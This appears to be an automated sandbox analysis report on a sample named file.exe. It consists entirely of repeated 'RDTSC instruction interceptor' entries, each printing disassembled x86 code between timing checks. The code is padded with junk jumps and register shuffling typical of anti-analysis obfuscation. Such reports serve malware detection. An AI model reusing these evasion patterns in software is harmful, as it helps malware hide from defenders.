              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8035F second address: 4C803DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 22h 0x0000000d call 00007FDE8C51D4E9h 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDE8C51D4E9h 0x0000001d xor ecx, 64F9D096h 0x00000023 jmp 00007FDE8C51D4E1h 0x00000028 popfd 0x00000029 mov si, D107h 0x0000002d popad 0x0000002e mov edx, dword ptr [ebp+0Ch] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edi, 682B8D2Ah 0x00000039 mov di, 51F6h 0x0000003d popad 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803DD second address: 4C803E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803E3 second address: 4C803E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803E7 second address: 4C80405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDE8CE8B4D1h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80405 second address: 4C8040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0396 second address: 4CB039C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB039C second address: 4CB03E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8C51D4E0h 0x00000009 sbb si, 20E8h 0x0000000e jmp 00007FDE8C51D4DBh 0x00000013 popfd 0x00000014 movzx eax, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FDE8C51D4E7h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB03E1 second address: 4CB03F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB03F9 second address: 4CB046B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDE8C51D4DDh 0x00000012 jmp 00007FDE8C51D4DBh 0x00000017 popfd 0x00000018 pushad 0x00000019 mov dx, si 0x0000001c mov ah, EBh 0x0000001e popad 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007FDE8C51D4DDh 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FDE8C51D4DFh 0x00000031 or esi, 5F91B8FEh 0x00000037 jmp 00007FDE8C51D4E9h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB046B second address: 4CB049E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE8CE8B4D7h 0x00000008 mov ah, 69h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE8CE8B4D1h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB049E second address: 4CB04A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB04A4 second address: 4CB04A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB04A8 second address: 4CB04D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FDE8C51D4DFh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDE8C51D4E5h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB04D8 second address: 4CB050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007FDE8CE8B4D3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDE8CE8B4D5h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB050C second address: 4CB0595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FDE8C51D4DEh 0x0000000f lea eax, dword ptr [ebp-04h] 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushfd 0x00000015 jmp 00007FDE8C51D4DDh 0x0000001a add ax, 9CC6h 0x0000001f jmp 00007FDE8C51D4E1h 0x00000024 popfd 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007FDE8C51D4E7h 0x0000002e xor ecx, 4B3DA3FEh 0x00000034 jmp 00007FDE8C51D4E9h 0x00000039 popfd 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0595 second address: 4CB05C0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDE8CE8B4D0h 0x00000008 xor cl, FFFFFFF8h 0x0000000b jmp 00007FDE8CE8B4CBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov ch, 3Bh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB05C0 second address: 4CB066B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FDE8C51D4E3h 0x0000000c sub si, 136Eh 0x00000011 jmp 00007FDE8C51D4E9h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FDE8C51D4E7h 0x00000020 sbb cx, 197Eh 0x00000025 jmp 00007FDE8C51D4E9h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007FDE8C51D4E0h 0x00000031 add si, 2478h 0x00000036 jmp 00007FDE8C51D4DBh 0x0000003b popfd 0x0000003c popad 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FDE8C51D4E0h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB066B second address: 4CB0671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0671 second address: 4CB06A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, A5h 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f call 00007FDE8C51D4DEh 0x00000014 mov edx, esi 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 call 00007FDE8C51D4DDh 0x0000001e pop eax 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB06D0 second address: 4CB06E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4D2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0748 second address: 4CB0757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0757 second address: 4CB078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8CE8B4CFh 0x00000009 adc ax, 99DEh 0x0000000e jmp 00007FDE8CE8B4D9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB078B second address: 4CB07DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a mov cx, A19Fh 0x0000000e jmp 00007FDE8C51D4E4h 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FDE8C51D4E2h 0x0000001a jmp 00007FDE8C51D4E5h 0x0000001f popfd 0x00000020 popad 0x00000021 leave 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB07DF second address: 4CB07F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB07F2 second address: 4CB07F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB07F8 second address: 4CB07FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB07FC second address: 4CB0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0800 second address: 4CA0206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 xor ebx, ebx 0x00000014 test al, 01h 0x00000016 jne 00007FDE8CE8B4C7h 0x00000018 xor eax, eax 0x0000001a sub esp, 08h 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007FDE91284A87h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 call 00007FDE8CE8B4D1h 0x00000039 pushfd 0x0000003a jmp 00007FDE8CE8B4D0h 0x0000003f jmp 00007FDE8CE8B4D5h 0x00000044 popfd 0x00000045 pop esi 0x00000046 mov edx, 35E87264h 0x0000004b popad 0x0000004c push ebx 0x0000004d pushad 0x0000004e mov edx, eax 0x00000050 push esi 0x00000051 pushfd 0x00000052 jmp 00007FDE8CE8B4D1h 0x00000057 adc eax, 4E0F7556h 0x0000005d jmp 00007FDE8CE8B4D1h 0x00000062 popfd 0x00000063 pop eax 0x00000064 popad 0x00000065 mov dword ptr [esp], ebp 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FDE8CE8B4CAh 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0206 second address: 4CA0218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0218 second address: 4CA0244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e jmp 00007FDE8CE8B4D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0244 second address: 4CA0248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0248 second address: 4CA0319 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push FFFFFFFEh 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e call 00007FDE8CE8B4C9h 0x00000013 pushad 0x00000014 mov cx, 36BDh 0x00000018 movzx eax, dx 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007FDE8CE8B4D4h 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 pushad 0x00000027 movsx edx, ax 0x0000002a call 00007FDE8CE8B4CAh 0x0000002f pop eax 0x00000030 popad 0x00000031 mov eax, dword ptr [eax] 0x00000033 jmp 00007FDE8CE8B4CCh 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c pushad 0x0000003d mov bx, 9ED4h 0x00000041 pushfd 0x00000042 jmp 00007FDE8CE8B4CDh 0x00000047 adc ecx, 2B838D96h 0x0000004d jmp 00007FDE8CE8B4D1h 0x00000052 popfd 0x00000053 popad 0x00000054 pop eax 0x00000055 pushad 0x00000056 mov bx, cx 0x00000059 mov di, cx 0x0000005c popad 0x0000005d push 2E8BCC65h 0x00000062 jmp 00007FDE8CE8B4CBh 0x00000067 xor dword ptr [esp], 5849E715h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FDE8CE8B4D5h 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0319 second address: 4CA0366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8C51D4E7h 0x00000009 add esi, 32D654DEh 0x0000000f jmp 00007FDE8C51D4E9h 0x00000014 popfd 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr fs:[00000000h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0366 second address: 4CA036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA036A second address: 4CA036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA036E second address: 4CA0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0374 second address: 4CA0382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0382 second address: 4CA03A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDE8CE8B4D3h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03A0 second address: 4CA03A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03A6 second address: 4CA03AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03AA second address: 4CA03AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03AE second address: 4CA03DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FDE8CE8B4D7h 0x00000010 sub esp, 18h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ch, dh 0x00000018 mov eax, 3D5496E3h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03DE second address: 4CA03F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA03F6 second address: 4CA0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FDE8CE8B4D6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FDE8CE8B4D1h 0x00000019 sbb esi, 130059F6h 0x0000001f jmp 00007FDE8CE8B4D1h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 mov ax, A13Dh 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0450 second address: 4CA0489 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 111B1439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FDE8C51D4E4h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDE8C51D4E7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0489 second address: 4CA055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FDE8CE8B4CBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FDE8CE8B4D4h 0x00000016 xor ah, 00000008h 0x00000019 jmp 00007FDE8CE8B4CBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FDE8CE8B4D8h 0x00000025 and esi, 4CBF7968h 0x0000002b jmp 00007FDE8CE8B4CBh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 jmp 00007FDE8CE8B4D6h 0x00000038 xchg eax, edi 0x00000039 jmp 00007FDE8CE8B4D0h 0x0000003e push eax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FDE8CE8B4D1h 0x00000046 xor esi, 7244B4E6h 0x0000004c jmp 00007FDE8CE8B4D1h 0x00000051 popfd 0x00000052 jmp 00007FDE8CE8B4D0h 0x00000057 popad 0x00000058 xchg eax, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA055C second address: 4CA0561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0561 second address: 4CA05AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76C84538h] 0x0000000e jmp 00007FDE8CE8B4D0h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 jmp 00007FDE8CE8B4D0h 0x0000001b xor eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA05AB second address: 4CA05AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA05AF second address: 4CA05B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA05B5 second address: 4CA05BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA05BC second address: 4CA0600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebp 0x00000008 jmp 00007FDE8CE8B4D8h 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007FDE8CE8B4D0h 0x00000015 lea eax, dword ptr [ebp-10h] 0x00000018 pushad 0x00000019 pushad 0x0000001a mov di, ax 0x0000001d mov ax, 187Fh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0722 second address: 4CA0726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0726 second address: 4CA072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA072C second address: 4CA074B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, D650h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C903E0 second address: 4C903EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C903EF second address: 4C904B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE8C51D4DFh 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FDE8C51D4E0h 0x00000015 push eax 0x00000016 pushad 0x00000017 movsx edi, cx 0x0000001a pushfd 0x0000001b jmp 00007FDE8C51D4DAh 0x00000020 sbb cx, 9A58h 0x00000025 jmp 00007FDE8C51D4DBh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FDE8C51D4DBh 0x00000034 or esi, 6251C11Eh 0x0000003a jmp 00007FDE8C51D4E9h 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 jmp 00007FDE8C51D4DEh 0x00000048 sub esp, 2Ch 0x0000004b pushad 0x0000004c movzx eax, dx 0x0000004f push edi 0x00000050 pushfd 0x00000051 jmp 00007FDE8C51D4E6h 0x00000056 sbb esi, 29524978h 0x0000005c jmp 00007FDE8C51D4DBh 0x00000061 popfd 0x00000062 pop eax 0x00000063 popad 0x00000064 push ebp 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C904B4 second address: 4C904BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C905BC second address: 4C90657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 sub edi, edi 0x00000008 jmp 00007FDE8C51D4E5h 0x0000000d inc ebx 0x0000000e jmp 00007FDE8C51D4DEh 0x00000013 test al, al 0x00000015 pushad 0x00000016 push ecx 0x00000017 pushfd 0x00000018 jmp 00007FDE8C51D4DDh 0x0000001d or eax, 5B07C516h 0x00000023 jmp 00007FDE8C51D4E1h 0x00000028 popfd 0x00000029 pop esi 0x0000002a call 00007FDE8C51D4E1h 0x0000002f pop ebx 0x00000030 popad 0x00000031 je 00007FDE8C51D730h 0x00000037 jmp 00007FDE8C51D4DAh 0x0000003c lea ecx, dword ptr [ebp-14h] 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 movsx ebx, cx 0x00000045 call 00007FDE8C51D4E6h 0x0000004a pop eax 0x0000004b popad 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90657 second address: 4C9065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9068B second address: 4C9068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9068F second address: 4C90695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90695 second address: 4C90703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push ecx 0x0000000c movsx edx, si 0x0000000f pop eax 0x00000010 call 00007FDE8C51D4DFh 0x00000015 mov ax, 92EFh 0x00000019 pop esi 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, edi 0x00000021 pushfd 0x00000022 jmp 00007FDE8C51D4E3h 0x00000027 add si, 812Eh 0x0000002c jmp 00007FDE8C51D4E9h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90703 second address: 4C90713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4CCh 0x00000009 rdtsc
